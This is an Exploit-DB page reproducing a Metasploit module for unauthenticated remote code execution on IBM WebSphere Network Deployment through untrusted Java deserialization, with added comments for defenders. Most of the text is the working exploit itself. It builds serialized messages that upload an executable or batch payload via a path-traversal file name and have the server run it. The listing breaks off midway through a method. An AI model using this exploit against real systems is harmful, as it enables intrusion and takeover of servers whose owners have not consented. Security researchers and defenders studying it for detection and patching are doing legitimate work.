- 18 Дек 2022
- EDB-ID
- 46969
- Проверка EDB
-
- Пройдено
- Автор
- METASPLOIT
- Тип уязвимости
- REMOTE
- Платформа
- WINDOWS
- CVE
- CVE-2019-8352, CVE-2019-4279
- Дата публикации
- 2019-06-05
IBM Websphere Application Server - Network Deployment Untrusted Data Deserialization Remote Code Execution (Metasploit)
Код:
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Powershell
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
# Declares the module's metadata (name, description, references, targets)
# and registers its connection options.
#
# Review notes for defenders, based only on the values set here:
# - RPORT defaults to 11006 and the inline comment also names 11002 and
#   11004; those are the listener ports to inventory and to restrict to
#   trusted management hosts.
# - The 'URL' reference is the vendor advisory; use it to confirm affected
#   and fixed versions.
# - NOTE(review): only CVE-2019-8352 is referenced here, while the
#   Exploit-DB record for this module (EDB-ID 46969) also lists
#   CVE-2019-4279 — confirm against the vendor advisory which one applies.
# - NOTE(review): the SSL defaults (SSLv3, cipher string 'ALL') suggest the
#   listener is expected to accept legacy protocol settings — verify on
#   your own deployment.
def initialize(info = {})
  super(update_info(info,
    'Name' => 'IBM Websphere Application Server Network Deployment Untrusted Data Deserialization Remote Code Execution',
    # The %( ) literal is kept flush-left so its contents stay exactly as published.
    'Description' => %(
This module exploits untrusted serialized data processed by the WAS DMGR Server and Cells.
NOTE: There is a required 2 minute timeout between attempts as the neighbor being added must be reset.
),
    'License' => MSF_LICENSE,
    'Author' =>
      [
        'b0yd' # @rwincey of [Securifera](https://www.securifera.com/) / Vulnerability Discovery and MSF module author
      ],
    'References' =>
      [
        ['CVE', '2019-8352'],
        ['URL', 'https://www-01.ibm.com/support/docview.wss?uid=ibm10883628']
      ],
    'Platform' => ['win'],
    # Two targets: a dropped Windows executable, or a generic command.
    'Targets' =>
      [
        [
          'Windows Binary', {
            'Arch' => [ARCH_X86, ARCH_X64],
            'Platform' => 'win'
          }
        ],
        [
          'CMD', {
            'Arch' => ARCH_CMD,
            'Platform' => 'win',
            'Payload' => {'Compat' => {'RequiredCmd' => 'generic'}}
          }
        ]
      ],
    'Privileged' => true,
    'DefaultTarget' => 0,
    'DisclosureDate' => 'May 15 2019'))
  register_options(
    [
      Opt::RPORT(11006), # 11002,11004,11006,etc
      OptBool.new('SSL', [true, 'Negotiate SSL/TLS', true]),
      OptRaw.new('SSLVersion', [true, 'Default Version for WASND ', 'SSLv3']),
      OptRaw.new('SSLVerifyMode', [true, 'SSL verification method', 'CLIENT_ONCE']),
      OptString.new('SSLCipher', [true, 'SSL Cipher string ', 'ALL'])
    ]
  )
end
# Closes the TCP connection, reports the disconnect, then runs the parent
# class's cleanup.
def cleanup
  disconnect
  print_status('Disconnected from IBM Websphere DMGR.')
  super
end
# Entry point. Opens the connection, sends a node-registration message,
# reads one reply, then sends a broadcast task message that carries a file
# body, a file name and a post-processing command.
#
# Host artefacts visible in this code (useful for detection and triage):
# - the file name is 8 random letters plus ".bat" (CMD target) or ".exe";
# - it is addressed with a relative "..\..\..\" prefix; the directory this
#   resolves against on the server is not shown here;
# - the name is passed to register_file_for_cleanup, so the file may no
#   longer be on disk afterwards — rely on file-creation and
#   process-creation telemetry rather than a later disk sweep.
def exploit
  command = nil
  if target.name == 'CMD'
    # The CMD target only works when the CMD option is set.
    fail_with(Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible") unless datastore['CMD']
    command = datastore['CMD']
  end
  # Connect to IBM Websphere Application Server
  connect
  print_status("Connected to IBM WAS DMGR.")
  node_port = datastore['RPORT']
  # Send packet to add neighbor
  enc_stream = construct_tcp_node_msg(node_port)
  send_msg(enc_stream)
  # One read; the reply content is not inspected.
  sock.get_once
  print_status('Server responded')
  # Generate binary name
  bin_name = rand_text_alpha(8)
  if command
    # Re-reads the same option that was already stored in `command` above.
    command = datastore['CMD']
    payload_contents = command.to_s
    print_status('Executing command: ' + payload_contents)
    bin_name << ".bat"
  else
    payload_contents = generate_payload_exe(code: payload.generate)
    bin_name << ".exe"
  end
  print_status("Sending payload: #{bin_name}")
  # Arguments: port, relative file path, file contents, post-processing command.
  enc_stream = construct_bcast_task_msg(node_port, "..\\..\\..\\" + bin_name, payload_contents, bin_name)
  send_msg(enc_stream)
  register_file_for_cleanup(bin_name)
end
# Wraps an encoded serialization stream in the frame header used by this
# module and writes it to the socket.
#
# Frame layout as built here: 4-byte big-endian constant, 4-byte big-endian
# length (stream length + 1), one zero byte, then the stream.
# The module's SSL option defaults to true, so this framing is only visible
# to network monitoring at a point where TLS is terminated.
#
# @param enc_stream [String] encoded Java serialization stream
def send_msg(enc_stream)
  # Fixed 32-bit value that opens every frame (presumably a protocol magic — confirm)
  pkt = [0x396fb74a].pack('N')
  # Length covers the single byte added next plus the stream
  pkt += [enc_stream.length + 1].pack('N')
  # One zero byte between header and stream; its meaning is not shown here
  pkt += "\x00"
  pkt += enc_stream
  # Send msg
  sock.put(pkt)
end
# Builds the encoded stream for the first message: one object described by
# build_tcp_node_msg (class com.ibm.son.mesh.TcpNodeMessage, message type 12,
# source address "0.0.0.0") that carries a node-property object described by
# build_p2p_node_class.
#
# @param node_port [Integer] port value written into the message
# @return [String] encoded serialization stream
def construct_tcp_node_msg(node_port)
  # Node-property object; build_p2p_node_class fills its class_data as a side effect
  p2p_obj = Rex::Java::Serialization::Model::NewObject.new
  p2p_obj.class_desc = Rex::Java::Serialization::Model::ClassDesc.new
  p2p_obj.class_desc.description = build_p2p_node_class(p2p_obj)
  # Create the obj
  object = Rex::Java::Serialization::Model::NewObject.new
  object.class_desc = Rex::Java::Serialization::Model::ClassDesc.new
  object.class_desc.description = build_tcp_node_msg(object, 12, "0.0.0.0", node_port, p2p_obj)
  # Create the stream and add the object
  stream = Rex::Java::Serialization::Model::Stream.new
  stream.contents = []
  stream.contents << object
  # Two trailing elements follow the object: an end-of-block marker and a null reference
  stream.contents << Rex::Java::Serialization::Model::EndBlockData.new
  stream.contents << Rex::Java::Serialization::Model::NullReference.new
  stream.encode
end
# Builds the encoded stream for the second message: one object described by
# build_bcast_run_task_msg (message type 41, source address "0.0.0.0") whose
# task argument is the upload-file object from build_upfile_arg_class.
#
# @param node_port [Integer] port value written into the message
# @param filename [String] file name stored in the upload argument
# @param byte_str [String] file contents
# @param cmd [String] value stored as the post-processing command
# @return [String] encoded serialization stream
def construct_bcast_task_msg(node_port, filename, byte_str, cmd)
  # Add upload file argument
  # "C*" turns the string into an array of unsigned byte values
  byte_arr = byte_str.unpack("C*")
  upfile_arg_obj = build_upfile_arg_class(filename, byte_arr, cmd)
  # Create the obj
  object = Rex::Java::Serialization::Model::NewObject.new
  object.class_desc = Rex::Java::Serialization::Model::ClassDesc.new
  object.class_desc.description = build_bcast_run_task_msg(object, 41, "0.0.0.0", node_port, upfile_arg_obj)
  # Create the stream and add the object
  stream = Rex::Java::Serialization::Model::Stream.new
  stream.contents = []
  stream.contents << object
  stream.encode
end
# Builds the class description for the base class com.ibm.son.mesh.Message
# and appends that class's member values to obj.class_data.
#
# @param obj [Rex::Java::Serialization::Model::NewObject] object whose
#   class_data receives the values (mutated)
# @param msg_id [Integer] value for the 'ID' field
# @param msg_type [Integer] value for the 'type' field
# @param orig_cell_field_type [Object] type descriptor for 'originatingCell'
#   (callers pass either a Utf type string or a Reference)
# @return [Rex::Java::Serialization::Model::NewClassDesc]
def build_message(obj, msg_id, msg_type, orig_cell_field_type)
  # Declare int field 'ID'
  id_field = Rex::Java::Serialization::Model::Field.new
  id_field.type = 'int'
  id_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'ID')
  # Declare int field 'type'
  type_field = Rex::Java::Serialization::Model::Field.new
  type_field.type = 'int'
  type_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'type')
  # Declare object field 'originatingCell' with the caller-supplied type
  new_field = Rex::Java::Serialization::Model::Field.new
  new_field.type = 'object'
  new_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'originatingCell')
  new_field.field_type = orig_cell_field_type
  # Create the class description
  msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
  msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.mesh.Message')
  msg_class_desc.serial_version = 1
  # 0x02 is SC_SERIALIZABLE in the Java serialization protocol
  msg_class_desc.flags = 2
  msg_class_desc.fields = []
  msg_class_desc.fields << id_field
  msg_class_desc.fields << type_field
  msg_class_desc.fields << new_field
  # Add annotations
  msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
  msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]
  # No superclass: the chain ends here with a null reference
  msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
  msg_class_desc.super_class.description = Rex::Java::Serialization::Model::NullReference.new
  # Set the member values, in the same order as the fields above;
  # 'originatingCell' is written as null
  obj.class_data << ['int', msg_id]
  obj.class_data << ['int', msg_type]
  obj.class_data << Rex::Java::Serialization::Model::NullReference.new
  msg_class_desc
end
# Builds the class description for com.ibm.son.mesh.BcastFloodMsg (superclass:
# the description returned by build_message) and appends its member values to
# obj.class_data.
#
# @param obj [Rex::Java::Serialization::Model::NewObject] object being filled (mutated)
# @param msg_type [Integer] message type passed on to build_message
# @param source_ip [String] dotted IPv4 address, split into byte values
# @param source_port [Integer] value for 'sourceUdpPort'
# @return [Rex::Java::Serialization::Model::NewClassDesc]
def build_bcast_flood_msg(obj, msg_type, source_ip, source_port)
  # Random message id below 4294967295; the same value is reused for 'sourceMsgID'
  prng = Random.new
  msg_id = prng.rand(4294967295)
  # Back-reference by wire handle instead of a literal type string; which
  # earlier stream entry it resolves to depends on write order — confirm
  field_ref = Rex::Java::Serialization::Model::Reference.new
  field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 1
  msg_obj = build_message(obj, msg_id, msg_type, field_ref)
  # Declare int field 'sourceMsgID'
  id_field = Rex::Java::Serialization::Model::Field.new
  id_field.type = 'int'
  id_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'sourceMsgID')
  # Declare int field 'sourceUdpPort'
  port_field = Rex::Java::Serialization::Model::Field.new
  port_field.type = 'int'
  port_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'sourceUdpPort')
  # Declare byte-array field 'sourceIP' ('[B' is the JVM descriptor for byte[])
  ip_arr_field = Rex::Java::Serialization::Model::Field.new
  ip_arr_field.type = 'array'
  ip_arr_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'sourceIP')
  ip_arr_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, '[B')
  # Create the class description
  msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
  msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.mesh.BcastFloodMsg')
  msg_class_desc.serial_version = 1
  # 0x02 is SC_SERIALIZABLE in the Java serialization protocol
  msg_class_desc.flags = 2
  msg_class_desc.fields = []
  msg_class_desc.fields << id_field
  msg_class_desc.fields << port_field
  msg_class_desc.fields << ip_arr_field
  # Add annotations
  msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
  msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]
  # Add superclass
  msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
  msg_class_desc.super_class.description = msg_obj
  # Construct IP Array
  ip_arr = source_ip.split(".").map(&:to_i)
  builder = Rex::Java::Serialization::Builder.new
  # NOTE(review): the serial literal has 18 hex digits, i.e. more than
  # 64 bits — confirm how the builder encodes it
  values_array = builder.new_array(
    values_type: 'byte',
    values: ip_arr,
    name: '[B',
    serial: 0x42acf317f8060854e0,
    annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
  )
  # Set the member values, in the same order as the fields above
  obj.class_data << ['int', msg_id]
  obj.class_data << ['int', source_port]
  obj.class_data << values_array
  msg_class_desc
end
# Builds the class description for com.ibm.son.mesh.TcpNodeMessage
# (superclass: the description returned by build_message) and appends its
# member values to obj.class_data.
#
# @param obj [Rex::Java::Serialization::Model::NewObject] object being filled (mutated)
# @param msg_type [Integer] message type passed on to build_message
# @param source_ip [String] dotted IPv4 address, split into byte values
# @param source_port [Integer] written to both 'tcpPort' and 'udpPort'
# @param p2p_obj [Rex::Java::Serialization::Model::NewObject] value for 'nodeProperty'
# @return [Rex::Java::Serialization::Model::NewClassDesc]
def build_tcp_node_msg(obj, msg_type, source_ip, source_port, p2p_obj)
  # Random message id below 4294967295
  prng = Random.new
  msg_id = prng.rand(4294967295)
  # Create the field type for the origCell
  field_type = Rex::Java::Serialization::Model::Utf.new(nil, "Ljava/lang/String;")
  msg_obj = build_message(obj, msg_id, msg_type, field_type)
  # Declare long field 'bootTime'
  boot_time_field = Rex::Java::Serialization::Model::Field.new
  boot_time_field.type = 'long'
  boot_time_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'bootTime')
  # Declare int field 'tcpPort'
  tcp_port_field = Rex::Java::Serialization::Model::Field.new
  tcp_port_field.type = 'int'
  tcp_port_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'tcpPort')
  # Declare int field 'udpPort'
  udp_port_field = Rex::Java::Serialization::Model::Field.new
  udp_port_field.type = 'int'
  udp_port_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'udpPort')
  # Declare byte-array field 'ip' ('[B' is the JVM descriptor for byte[])
  ip_arr_field = Rex::Java::Serialization::Model::Field.new
  ip_arr_field.type = 'array'
  ip_arr_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'ip')
  ip_arr_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, '[B')
  # Declare object field 'nodeProperty' of type AppLevelNodeProperty
  node_prop_field = Rex::Java::Serialization::Model::Field.new
  node_prop_field.type = 'object'
  node_prop_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'nodeProperty')
  node_prop_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, "Lcom/ibm/son/mesh/AppLevelNodeProperty;")
  # Create the class description
  msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
  msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.mesh.TcpNodeMessage')
  msg_class_desc.serial_version = 1
  # 0x02 is SC_SERIALIZABLE in the Java serialization protocol
  msg_class_desc.flags = 2
  msg_class_desc.fields = []
  msg_class_desc.fields << boot_time_field
  msg_class_desc.fields << tcp_port_field
  msg_class_desc.fields << udp_port_field
  msg_class_desc.fields << ip_arr_field
  msg_class_desc.fields << node_prop_field
  # Add annotations
  msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
  msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]
  # Add superclass
  msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
  msg_class_desc.super_class.description = msg_obj
  # Construct IP Array
  ip_arr = source_ip.split(".").map(&:to_i)
  builder = Rex::Java::Serialization::Builder.new
  # NOTE(review): the serial literal has 18 hex digits, i.e. more than
  # 64 bits — confirm how the builder encodes it
  values_array = builder.new_array(
    values_type: 'byte',
    values: ip_arr,
    name: '[B',
    serial: 0x42acf317f8060854e0,
    annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
  )
  # Set the member values, in field order: bootTime is 0 and the same port
  # is used for tcpPort and udpPort
  obj.class_data << ['long', 0]
  obj.class_data << ['int', source_port]
  obj.class_data << ['int', source_port]
  obj.class_data << values_array
  obj.class_data << p2p_obj
  msg_class_desc
end
# Builds the class description for com.ibm.son.mesh.AppLevelNodeProperty and
# appends its member values to obj.class_data.
#
# @param obj [Rex::Java::Serialization::Model::NewObject] object being filled (mutated)
# @return [Rex::Java::Serialization::Model::NewClassDesc]
def build_app_node_class(obj)
  # Declare boolean field 'structuredGateway'
  struct_bool_field = Rex::Java::Serialization::Model::Field.new
  struct_bool_field.type = 'boolean'
  struct_bool_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'structuredGateway')
  # Declare int field 'version'
  version_field = Rex::Java::Serialization::Model::Field.new
  version_field.type = 'int'
  version_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'version')
  # Declare object field 'bridgedCellsList' of type java.util.List
  bridge_field = Rex::Java::Serialization::Model::Field.new
  bridge_field.type = 'object'
  bridge_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'bridgedCellsList')
  bridge_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, 'Ljava/util/List;')
  # Back-reference by wire handle used as the type of 'cellName'; which
  # earlier stream entry it resolves to depends on write order — confirm
  field_ref = Rex::Java::Serialization::Model::Reference.new
  field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 4
  # Declare object field 'cellName'
  cellname_field = Rex::Java::Serialization::Model::Field.new
  cellname_field.type = 'object'
  cellname_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'cellName')
  cellname_field.field_type = field_ref
  # Create the class description
  msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
  msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.mesh.AppLevelNodeProperty')
  msg_class_desc.serial_version = 1
  # 0x02 is SC_SERIALIZABLE in the Java serialization protocol
  msg_class_desc.flags = 2
  msg_class_desc.fields = []
  msg_class_desc.fields << struct_bool_field
  msg_class_desc.fields << version_field
  msg_class_desc.fields << bridge_field
  msg_class_desc.fields << cellname_field
  # Add annotations
  msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
  msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]
  # No superclass: the chain ends here with a null reference
  msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
  msg_class_desc.super_class.description = Rex::Java::Serialization::Model::NullReference.new
  # Set the member values, in field order; the list is written as null and
  # the cell name is a random decimal string
  obj.class_data << ['boolean', 0]
  obj.class_data << ['int', 0]
  obj.class_data << Rex::Java::Serialization::Model::NullReference.new
  obj.class_data << Rex::Java::Serialization::Model::Utf.new(nil, rand(0xffffffffffff).to_s) # Cell Name
  msg_class_desc
end
# Builds the class description for java.util.Hashtable and appends its member
# values, followed by one block-data element, to obj.class_data.
#
# @param obj [Rex::Java::Serialization::Model::NewObject] object being filled (mutated)
# @return [Rex::Java::Serialization::Model::NewClassDesc]
def build_hashtable_class(obj)
  # Declare float field 'loadFactor'
  load_field = Rex::Java::Serialization::Model::Field.new
  load_field.type = 'float'
  load_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'loadFactor')
  # Declare int field 'threshold'
  threshold_field = Rex::Java::Serialization::Model::Field.new
  threshold_field.type = 'int'
  threshold_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'threshold')
  # Create the class description
  msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
  msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'java.util.Hashtable')
  msg_class_desc.serial_version = 0x13BB0F25214AE4B8
  # 0x03 is SC_WRITE_METHOD | SC_SERIALIZABLE: the class writes extra data
  # after its declared fields
  msg_class_desc.flags = 3
  msg_class_desc.fields = []
  msg_class_desc.fields << load_field
  msg_class_desc.fields << threshold_field
  # Add annotations
  msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
  msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]
  # No superclass: the chain ends here with a null reference
  msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
  msg_class_desc.super_class.description = Rex::Java::Serialization::Model::NullReference.new
  # Field values, in field order
  obj.class_data << ['float', 0.75]
  obj.class_data << ['int', 8]
  # Two big-endian ints, 11 and 3; 3 matches the number of key/value pairs
  # that build_properties_class appends (presumably capacity and entry count — confirm)
  obj.class_data << Rex::Java::Serialization::Model::BlockData.new(nil, "\x00\x00\x00\x0b\x00\x00\x00\x03")
  msg_class_desc
end
# Builds a complete java.util.Properties object (superclass description from
# build_hashtable_class) holding three key/value string pairs:
# 'memberName', 'inOdc' and 'epoch'.
#
# @return [Rex::Java::Serialization::Model::NewObject]
def build_properties_class
  # Create the object
  object = Rex::Java::Serialization::Model::NewObject.new
  object.class_desc = Rex::Java::Serialization::Model::ClassDesc.new
  # Appends the Hashtable-level values to object.class_data first
  msg_obj = build_hashtable_class(object)
  # Back-reference by wire handle used as the type of 'defaults'; which
  # earlier stream entry it resolves to depends on write order — confirm
  field_ref = Rex::Java::Serialization::Model::Reference.new
  field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 9
  # Declare object field 'defaults'
  defaults_field = Rex::Java::Serialization::Model::Field.new
  defaults_field.type = 'object'
  defaults_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'defaults')
  defaults_field.field_type = field_ref
  # Create the class description
  msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
  msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'java.util.Properties')
  msg_class_desc.serial_version = 0x3912D07A70363E98
  # 0x02 is SC_SERIALIZABLE in the Java serialization protocol
  msg_class_desc.flags = 2
  msg_class_desc.fields = []
  msg_class_desc.fields << defaults_field
  # Add annotations
  msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
  msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]
  # Add superclass
  msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
  msg_class_desc.super_class.description = msg_obj
  # Set the member values: alternating key and value strings
  object.class_desc.description = msg_class_desc
  object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, 'memberName')
  object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, rand(0xffffffffffff).to_s) # Cell Name
  object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, 'inOdc')
  object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, '0')
  object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, 'epoch')
  # Current time in milliseconds, as a decimal string
  object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, (Time.now.to_f * 1000).to_i.to_s)
  object
end
# Builds the class description for com.ibm.ws.wsgroup.p2p.P2PShimNodeProperty
# (superclass: the description returned by build_app_node_class) and appends
# its member values to obj.class_data: an empty byte array and a Properties
# object.
#
# @param obj [Rex::Java::Serialization::Model::NewObject] object being filled (mutated)
# @return [Rex::Java::Serialization::Model::NewClassDesc]
def build_p2p_node_class(obj)
  # Appends the superclass-level values to obj.class_data first
  msg_obj = build_app_node_class(obj)
  # Back-reference by wire handle used as the type of 'data'; which earlier
  # stream entry it resolves to depends on write order — confirm
  field_ref = Rex::Java::Serialization::Model::Reference.new
  field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 1
  # Declare array field 'data'
  data_field = Rex::Java::Serialization::Model::Field.new
  data_field.type = 'array'
  data_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'data')
  data_field.field_type = field_ref
  # Declare object field 'properties' of type java.util.Properties
  prop_field = Rex::Java::Serialization::Model::Field.new
  prop_field.type = 'object'
  prop_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'properties')
  prop_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, 'Ljava/util/Properties;')
  # Create the class description
  msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
  msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.ws.wsgroup.p2p.P2PShimNodeProperty')
  msg_class_desc.serial_version = 2
  # 0x02 is SC_SERIALIZABLE in the Java serialization protocol
  msg_class_desc.flags = 2
  msg_class_desc.fields = []
  msg_class_desc.fields << data_field
  msg_class_desc.fields << prop_field
  # Add annotations
  msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
  msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]
  # Add superclass
  msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
  msg_class_desc.super_class.description = msg_obj
  # Second back-reference, used as the class description of the byte array below
  field_ref = Rex::Java::Serialization::Model::Reference.new
  field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 6
  # Empty byte array for the 'data' field
  byte_array = Rex::Java::Serialization::Model::NewArray.new
  byte_array.array_description = Rex::Java::Serialization::Model::ClassDesc.new
  byte_array.array_description.description = field_ref
  byte_array.type = "byte"
  byte_array.values = []
  # Set the member values
  obj.class_data << byte_array
  # Add properties
  obj.class_data << build_properties_class
  msg_class_desc
end
# Builds a complete com.ibm.son.plugin.UploadFileArgument object with three
# members: 'fileBody' (byte array), 'fileName' and 'postProcCmd'.
#
# For defenders: this is the object that carries the file contents, the
# destination name and the post-processing command, so the class name is a
# useful anchor when reviewing decrypted traffic or server-side logs for this
# message type. The advisory referenced in the module metadata is the place
# to confirm remediation.
#
# @param filename [String] value for 'fileName'
# @param bytes [Array<Integer>] byte values for 'fileBody'
# @param cmd [String] value for 'postProcCmd'
# @return [Rex::Java::Serialization::Model::NewObject]
def build_upfile_arg_class(filename, bytes, cmd)
  # Back-reference by wire handle used as the type of 'fileName'; which
  # earlier stream entry it resolves to depends on write order — confirm
  field_ref = Rex::Java::Serialization::Model::Reference.new
  field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 1
  # Declare object field 'fileName'
  filename_field = Rex::Java::Serialization::Model::Field.new
  filename_field.type = 'object'
  filename_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'fileName')
  filename_field.field_type = field_ref
  # Back-reference used as the type of 'fileBody'
  field_ref = Rex::Java::Serialization::Model::Reference.new
  field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 4
  # Declare array field 'fileBody'
  filebody_field = Rex::Java::Serialization::Model::Field.new
  filebody_field.type = 'array'
  filebody_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'fileBody')
  filebody_field.field_type = field_ref
  # Back-reference used as the type of 'postProcCmd' (same handle as 'fileName')
  field_ref = Rex::Java::Serialization::Model::Reference.new
  field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 1
  # Declare object field 'postProcCmd'
  post_cmd_field = Rex::Java::Serialization::Model::Field.new
  post_cmd_field.type = 'object'
  post_cmd_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'postProcCmd')
  post_cmd_field.field_type = field_ref
  # Create the class description
  msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
  msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.plugin.UploadFileArgument')
  msg_class_desc.serial_version = 1
  # 0x02 is SC_SERIALIZABLE in the Java serialization protocol
  msg_class_desc.flags = 2
  msg_class_desc.fields = []
  # Field order here (fileBody, fileName, postProcCmd) matches the value order below
  msg_class_desc.fields << filebody_field
  msg_class_desc.fields << filename_field
  msg_class_desc.fields << post_cmd_field
  # Add annotations
  msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
  msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]
  # No superclass: the chain ends here with a null reference
  msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
  msg_class_desc.super_class.description = Rex::Java::Serialization::Model::NullReference.new
  # Back-reference used as the class description of the byte array below
  field_ref = Rex::Java::Serialization::Model::Reference.new
  field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 7
  # Byte array holding the file contents
  byte_array = Rex::Java::Serialization::Model::NewArray.new
  byte_array.array_description = Rex::Java::Serialization::Model::ClassDesc.new
  byte_array.array_description.description = field_ref
  byte_array.type = "byte"
  byte_array.values = bytes
  # Set the member values
  object = Rex::Java::Serialization::Model::NewObject.new
  object.class_desc = Rex::Java::Serialization::Model::ClassDesc.new
  object.class_desc.description = msg_class_desc
  object.class_data << byte_array
  object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, filename)
  object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, cmd)
  object
end
# Builds the class description for com.ibm.son.plugin.BcastMsgRunTask
# (superclass: the description returned by build_bcast_flood_msg) and appends
# its member values to obj.class_data. The 'task' value is the fixed string
# 'com.ibm.son.plugin.UploadFileToAllNodes'.
#
# @param obj [Rex::Java::Serialization::Model::NewObject] object being filled (mutated)
# @param msg_type [Integer] message type passed on to build_bcast_flood_msg
# @param source_ip [String] dotted IPv4 address passed on to build_bcast_flood_msg
# @param source_port [Integer] port passed on to build_bcast_flood_msg
# @param upfile_arg_obj [Rex::Java::Serialization::Model::NewObject] value for 'taskArgument'
# @return [Rex::Java::Serialization::Model::NewClassDesc]
def build_bcast_run_task_msg(obj, msg_type, source_ip, source_port, upfile_arg_obj)
  # Appends the superclass-level values to obj.class_data first
  msg_obj = build_bcast_flood_msg(obj, msg_type, source_ip, source_port)
  # Declare int field 'outputGatherInterval'
  out_int_field = Rex::Java::Serialization::Model::Field.new
  out_int_field.type = 'int'
  out_int_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'outputGatherInterval')
  # Declare object field 'task' of type java.lang.String
  task_field = Rex::Java::Serialization::Model::Field.new
  task_field.type = 'object'
  task_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'task')
  task_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, "Ljava/lang/String;")
  # Declare object field 'taskArgument' of type java.io.Serializable
  task_arg_field = Rex::Java::Serialization::Model::Field.new
  task_arg_field.type = 'object'
  task_arg_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'taskArgument')
